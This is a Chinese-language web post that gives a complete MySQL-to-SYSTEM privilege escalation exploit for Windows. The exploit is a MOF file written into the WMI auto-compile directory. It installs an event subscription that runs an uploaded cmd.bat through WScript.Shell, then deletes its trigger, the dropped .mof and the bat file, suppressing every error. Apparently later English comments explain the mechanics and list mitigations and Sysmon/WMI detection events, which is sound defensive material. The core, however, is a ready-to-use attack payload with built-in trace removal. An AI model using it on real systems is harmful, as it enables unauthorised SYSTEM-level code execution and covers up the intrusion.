Mysql 提权即时无错Mof exp
这个sql提权MOF需要运行 system下的文件,不能定义路径。需要将要运行的命令写入到bat上传到system32目录,然后执行。
这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。
// MOF (Managed Object Format) listing that installs a WMI permanent event
// subscription in root\cimv2: an event filter (__EventFilter), a script
// consumer (ActiveScriptEventConsumer running JScript) and a binding between
// the two. The page presents it as a MySQL-to-SYSTEM escalation: the .mof is
// written into the WMI auto-compile directory and compiled by the WMI service.
// Defensive context: this only works where the WMI service still auto-compiles
// files dropped into %SystemRoot%\System32\wbem\mof (legacy Windows releases;
// later releases removed that behaviour - confirm for the OS in question) and
// where the database account holds FILE privilege and can write to that
// directory. Mitigations: run the database service as a low-privileged
// account, restrict FILE privilege and set secure_file_priv, and alert on
// creation of the subscription classes used below. Detection: Sysmon event
// IDs 19/20/21 (WmiEventFilter / WmiEventConsumer / WmiEventConsumerToFilter)
// and Microsoft-Windows-WMI-Activity/Operational event 5861 record these
// objects when they are created.
// Token layout below is whitespace-mangled by extraction; tokens are kept as-is.
#pragma
namespace("\\\\.\\root\\cimv2")
// Marker class: creating an instance of it (last statement of the file) is the
// event that $Filt matches, so it acts as the trigger for the whole chain.
class
MyClass547
{
string
Name;
};
// Declares the ActiveScriptEventConsumer class in this namespace and (next two
// instances) registers its provider by CLSID. The stock consumer normally
// lives in root\subscription; declaring it here presumably avoids depending on
// that namespace - confirm against the target WMI repository.
class
ActiveScriptEventConsumer
: __EventConsumer {
string
Name;
string
ScriptingEngine; string
ScriptFileName;
string
ScriptText; uint32 KillTimeout;
}; instance of __Win32Provider as $P {
Name
=
"ActiveScriptEventConsumer"; CLSID =
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
PerUserInitialization
= TRUE;
}; instance of __EventConsumerProviderRegistration { Provider
= $P; ConsumerClassNames
=
{"ActiveScriptEventConsumer"};
};
// Consumer $cons ("ASEC"): JScript that launches cmd.bat through
// WScript.Shell, then deletes the marker class, the "instfilt" filter and
// itself - i.e. the subscription removes its own trigger after it fires.
Instance of ActiveScriptEventConsumer
as $cons { Name
=
"ASEC"; ScriptingEngine
=
"JScript"; ScriptText
=
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
// Consumer $cons2 ("qndASEC"): clean-up script - deletes the dropped .mof
// under wbem\mof\good\, deletes cmd.bat, then removes the "qndfilt" filter and
// itself. Both consumers swallow every error (empty catch blocks), so partial
// clean-up leaves no trace in the script itself; the WMI activity log is the
// remaining evidence.
Instance of ActiveScriptEventConsumer
as $cons2 { Name
=
"qndASEC"; ScriptingEngine
=
"JScript"; ScriptText
=
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
// Filters: $Filt ("instfilt") matches creation of a MyClass547 instance (the
// trigger); $Filt2 ("qndfilt") polls every second (WITHIN 1) for deletion of a
// Win32_Process named cmd.bat, so the clean-up consumer runs once the payload
// process has exited.
}; instance of __EventFilter as $Filt { Name
=
"instfilt"; Query
=
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
=
"WQL"; }; instance of __EventFilter as $Filt2 { Name
=
"qndfilt"; Query
=
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
=
// Bindings wire each filter to its consumer. These __FilterToConsumerBinding
// objects are what a defender enumerates (e.g. Get-WmiObject -Namespace
// root\cimv2 -Class __FilterToConsumerBinding); note the namespace is
// root\cimv2 per the #pragma above, not the usual root\subscription, so a
// sweep limited to root\subscription would miss this subscription.
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
= $cons; Filter
= $Filt;
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
= $cons2; Filter
= $Filt2;
// Final statement: instantiating MyClass547 raises the __InstanceCreationEvent
// that $Filt matches, which is what starts the chain.
}; instance of MyClass547
as $MyClass { Name
=
"ClassConsumer";
};